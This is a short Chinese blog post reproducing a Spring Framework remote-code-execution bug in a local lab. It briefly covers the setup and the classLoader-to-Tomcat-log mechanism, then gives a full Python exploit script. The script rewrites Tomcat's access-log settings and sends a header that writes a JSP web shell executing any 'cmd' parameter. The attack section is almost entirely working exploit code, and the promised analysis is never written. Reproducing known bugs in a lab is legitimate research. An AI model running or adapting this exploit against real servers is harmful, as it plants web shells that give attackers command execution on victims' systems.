起因经过

这个洞在29号漏出后,我反正是摆烂的,没怎么动手。
后面在31号才拿到环境,然后利用作者写的文章进行复现。

  1. 简单的idea Spring项目环境搭建,坑点是有几个依赖包没有,以及JDK17不支持漏洞。
  2. 实现原理:通过Bean对象的生成中有缓存class方式,然后通过这个利用点,构造log日志调用链,从而达到rec的目的。
  3. exp
    from time import sleep

import requests

test = ["class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bfuck%7Di",
        "class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp",
        "class.module.classLoader.resources.context.parent.pipeline.first.directory=/Users/yunoon/Downloads/spring"
        "-rce-war-fa55cb4b11516784574d06948d53ac90f8430f50/out/artifacts/stupidRumor_war_exploded",
        "class.module.classLoader.resources.context.parent.pipeline.first.prefix=fuckJsp",
        "class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat="]

url = "http://localhost:8084/stupidRumor_war_exploded/index?"

url2 = "http://localhost:8084/stupidRumor_war_exploded/index?"
for i in range(5):
    url2 = url2 + "&" + test[i]
print(url2)
res = requests.get(url=url2)
print(res.status_code)

header = {
    'User-Agent': "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.7113.93 "
                  "Safari/537.36",
    'Accept': "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
    'fuck': '<%Runtime.getRuntime().exec(request.getParameter("cmd"));%>',
    'Accept-Language': "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
    'Accept-Encoding': "gzip, deflate",
    'Connection': "close",
    'Upgrade-Insecure-Requests': "1",
    'Sec-Fetch-Dest': "document",
    'Sec-Fetch-Mode': "navigate",
    'Sec-Fetch-Site': "none",
    'Sec-Fetch-User': "?1",
}
#
url1 = "http://localhost:8084/stupidRumor_war_exploded/fuckUUUU"
res = requests.get(url=url1, headers=header)
print(res.status_code)
  4. 后面后空会分析原理的,咕咕咕。

标签: RealWord

添加新评论